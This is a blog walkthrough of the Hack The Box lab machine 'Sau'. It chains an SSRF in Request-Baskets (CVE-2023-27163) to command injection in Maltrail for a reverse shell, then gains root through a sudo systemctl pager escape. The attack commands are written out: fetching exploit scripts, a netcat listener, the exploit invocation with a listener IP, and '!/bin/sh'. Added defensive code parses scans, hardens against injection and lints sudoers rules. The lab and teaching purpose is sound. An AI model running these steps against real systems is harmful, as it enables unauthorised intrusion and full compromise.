Hi everyone! Welcome to pentestguy. In this post we are going through the Sau HackTheBox walkthrough. Sau is a Linux-based CTF (capture the flag) machine rated easy difficulty. You can find the Sau machine on the Hack The Box platform using this link.
For the Sau machine walkthrough we start with enumeration: port scanning, checking which services run on the discovered ports, and looking for public exploits for the versions found. We then get into the system by exploiting one of those services, obtain the user flag, and escalate to root.
Nmap Scan
Let's do a normal port scan with nmap, using the service-version (-sV) and default-script (-sC) options and saving the output with -oN.
nmap -sV -sC 10.10.X.X -oN nmap.output
# Nmap 7.80 scan initiated Tue Dec 26 23:32:19 2023 as: nmap -sV -sC -oN nmap 10.10.11.224
Nmap scan report for 10.10.11.224
Host is up (0.32s latency).
Not shown: 985 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp filtered http
1085/tcp filtered webobjects
1102/tcp filtered adobeserver-1
1124/tcp filtered hpvmmcontrol
1461/tcp filtered ibm_wrless_lan
3006/tcp filtered deslogind
3766/tcp filtered sitewatch-s
5080/tcp filtered onscreen
7100/tcp filtered font-service
32783/tcp filtered unknown
41511/tcp filtered unknown
49175/tcp filtered unknown
50500/tcp filtered unknown
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Tue, 26 Dec 2023 18:03:47 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[\w\d\-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Tue, 26 Dec 2023 18:03:13 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Tue, 26 Dec 2023 18:03:15 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.80%I=7%D=12/26%Time=658B1561%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html;
SF:\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Tue,\x2026\x20Dec\x2
SF:02023\x2018:03:13\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\"/
SF:web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\
SF:x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x20
SF:200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Tue,\x2026\x20Dec\x2
SF:02023\x2018:03:15\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPReques
SF:t,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain
SF:;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request
SF:")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCo
SF:ntent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n
SF:\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400
SF:\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n
SF:Connection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20
SF:charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(
SF:Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\
SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Option
SF:s:\x20nosniff\r\nDate:\x20Tue,\x2026\x20Dec\x202023\x2018:03:47\x20GMT\
SF:r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20na
SF:me\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\$
SF:\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20cl
SF:ose\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 26 23:35:02 2023 -- 1 IP address (1 host up) scanned in 162.94 seconds
In the above scan we see that port 80 is present but filtered, while port 55555 is open and nmap could not identify the service. The fingerprint shows HTTP responses (a redirect to /web and an "invalid basket name" error), so a web service is running on 55555.
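When triaging a scan like the one above, the two things worth pulling out are open ports whose service nmap could not identify and well-known ports that show as filtered (something answers, just not to us). The following parser is an added example written for this post, not a tool from the original; it reads nmap's normal (-oN) output format and runs on a constructed excerpt modelled on the scan above.

```python
import re
from dataclasses import dataclass

# Constructed excerpt in nmap -oN (normal output) format, modelled on the scan above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.11.224
Host is up (0.32s latency).
Not shown: 985 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp filtered http
1085/tcp filtered webobjects
55555/tcp open unknown
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.0 302 Found
|_    Location: /web
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line: "<port>/<proto> <state> <service> [version...]"
PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(open|filtered|closed|open\|filtered)\s+(\S+)(?:\s+(.*))?$"
)


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_normal(text):
    """Extract port records from nmap -oN output; script output lines ('|') are skipped."""
    records = []
    for line in text.splitlines():
        match = PORT_LINE.match(line.strip())
        if match:
            port, proto, state, service, version = match.groups()
            records.append(PortRecord(int(port), proto, state, service, version or ""))
    return records


def triage(records):
    """Ports that deserve a closer look: open ports with no identified service/version,
    and filtered ports in the well-known range (a host-local firewall or bind address
    is often hiding a service there)."""
    unidentified_open = [
        r.port for r in records
        if r.state == "open" and (r.service == "unknown" or not r.version)
    ]
    filtered_wellknown = [r.port for r in records if r.state == "filtered" and r.port < 1024]
    return {"unidentified_open": unidentified_open, "filtered_wellknown": filtered_wellknown}


if __name__ == "__main__":
    for rec in parse_nmap_normal(SAMPLE_NMAP_OUTPUT):
        print(rec)
    print(triage(parse_nmap_normal(SAMPLE_NMAP_OUTPUT)))
```

Run against the scan above, the triage flags 55555 as an unidentified open port and 80 as a filtered well-known port, which is exactly the pair that drives the rest of this walkthrough.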
Exploitation
After analysing the web service we found that Request-Baskets version 1.2.1 is running on that port. Searching for a public exploit for that version turns one up: CVE-2023-27163, a server-side request forgery (SSRF) vulnerability.
If you want a direct shell into the system you can try the automated exploit chain for Request-Baskets and Maltrail using this script – https://github.com/HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53
Here we are going to see two different ways to exploit the SSRF: one manual and one using an automated script.
Manual Way
Create a new basket first.
Open the basket settings from the right-hand sidebar and point the basket's forward URL at http://127.0.0.1:80. Remember from the port scan that port 80 was filtered, which means something is listening there that we cannot reach directly; the server-side request forgery makes the Request-Baskets server fetch it for us.
Now open the newly created basket URL: the forwarded response shows another service running on port 80, Maltrail version 0.53.
Automated Way
For the same SSRF we can use the shell script available on GitHub – https://github.com/entr0pie/CVE-2023-27163
To exploit it, download the shell script, make it executable and run it with the Request-Baskets URL and the internal target:
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
chmod +x CVE-2023-27163.sh
./CVE-2023-27163.sh http://10.10.X.X:55555 http://127.0.0.1:80
Again, after searching we found that there is an OS command injection vulnerability in that Maltrail version. Download the exploit from GitHub: https://github.com/spookier/Maltrail-v0.53-Exploit
Make sure a netcat listener is running to catch the shell; to do that use the following command:
nc -lvp 8888
To exploit it, run the following command with your listener IP and port and the basket URL:
python3 exploit.py 10.10.14.129 8888 http://10.10.X.X/x8sspx1
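An OS command injection of this kind comes down to one coding pattern: user input concatenated into a string that a shell then re-parses. The example below is added for this post and is not Maltrail's code; it shows the hardened form a defender would want, which is an input allowlist plus passing the value as a single argv element so no shell ever interprets it. `sys.executable` stands in for whatever helper tool the application would invoke, and simply echoes its first argument back.

```python
import re
import subprocess
import sys

# Hypothetical allowlist for a field that ends up on a command line.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# Unsafe shape, shown for contrast only (never executed here):
#   subprocess.check_output("lookup-tool --user " + username, shell=True)
# The shell re-parses that string, so shell metacharacters in `username` change what runs.


def validate_username(username):
    """Reject anything outside a conservative character allowlist."""
    return USERNAME_RE.fullmatch(username) is not None


def build_argv(username):
    """Build the child command as an argv list: `username` becomes exactly one argument,
    whatever characters it contains, because no shell parses it.
    sys.executable stands in for the real helper tool and just writes argv[1] back."""
    return [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", username]


def run_literal(username):
    """Run the argv form *without* the allowlist, to show that argv passing alone
    keeps metacharacters as plain data."""
    return subprocess.run(build_argv(username), capture_output=True, text=True, check=True).stdout


def lookup_user(username):
    """Hardened entry point: allowlist first, then argv execution (defence in depth)."""
    if not validate_username(username):
        raise ValueError("username rejected by allowlist")
    return run_literal(username)


if __name__ == "__main__":
    print(lookup_user("alice"))
    print(run_literal("alice; whoami"))  # printed back verbatim, nothing else runs
    try:
        lookup_user("alice; whoami")
    except ValueError as exc:
        print("rejected:", exc)
```

The two layers matter independently: the argv list is what actually removes the injection, while the allowlist keeps surprising input (very long strings, leading dashes that a tool might parse as options) out of the child process altogether.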
User flag
After getting into the system, simply go to the home directory, where we can find the user flag.
Root user
To get root, try the simplest privilege-escalation check first: sudo -l shows that systemctl status can be run as root. systemctl hands its output to a pager (less), and at the pager prompt !/bin/sh spawns a shell as root.
sudo -l
sudo /usr/bin/systemctl status trail.service
!/bin/sh
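The sudo rule itself is the weakness: any command that hands its output to a pager or editor gives the caller a shell. As an added example for this post (not a tool from the original), the linter below parses sudoers-style rules and flags commands from a short list of known pager-spawning programs unless they are pinned with --no-pager. The sudoers lines are constructed for illustration and are not the machine's real file.

```python
import re

# Constructed sudoers-style lines for illustration (not the machine's real sudoers).
SAMPLE_SUDOERS = """\
# constructed example file
Defaults env_reset
root ALL=(ALL:ALL) ALL
svcuser ALL=(ALL) NOPASSWD: /usr/bin/systemctl status trail.service
ops ALL=(ALL) NOPASSWD: /usr/bin/systemctl --no-pager status trail.service
backup ALL=(ALL) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/
"""

# Programs that hand their output to a pager or editor, from which a shell can be spawned.
PAGER_SPAWNERS = {"systemctl", "journalctl", "git", "man", "less", "more"}

# "<user> <host>=(<runas>) [NOPASSWD:|PASSWD:] <cmd>[, <cmd>...]"
RULE_RE = re.compile(r"^(\S+)\s+(\S+)=\((\S+)\)\s+(?:(NOPASSWD|PASSWD):\s*)?(.+)$")


def parse_sudoers(text):
    """Return one dict per command specification; comments and Defaults lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        user, host, runas, tag, cmds = match.groups()
        for cmd in cmds.split(","):
            rules.append({
                "user": user,
                "host": host,
                "runas": runas,
                "nopasswd": tag == "NOPASSWD",
                "command": cmd.strip(),
            })
    return rules


def find_pager_escapes(rules):
    """(user, command) pairs where a pager-spawning program is allowed without --no-pager."""
    findings = []
    for rule in rules:
        argv = rule["command"].split()
        if not argv or argv[0] == "ALL":
            continue  # 'ALL' is a different class of problem and is reviewed separately
        program = argv[0].rsplit("/", 1)[-1]
        if program in PAGER_SPAWNERS and "--no-pager" not in argv:
            findings.append((rule["user"], rule["command"]))
    return findings


if __name__ == "__main__":
    for user, command in find_pager_escapes(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{user}: '{command}' can spawn a pager as root")
```

Because sudo matches the command line exactly, the user cannot drop --no-pager from the ops rule, so that form is safe from this particular escape; the svcuser rule is the one that maps to the walkthrough. A fuller audit would check every allowed program against a reference such as GTFOBins rather than this short list.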
If you found this post helpful, please share it with your co-workers and friends. Leave a comment and let us know if you have any suggestions. You can now also collaborate with us; please check our collaboration page. Thank you!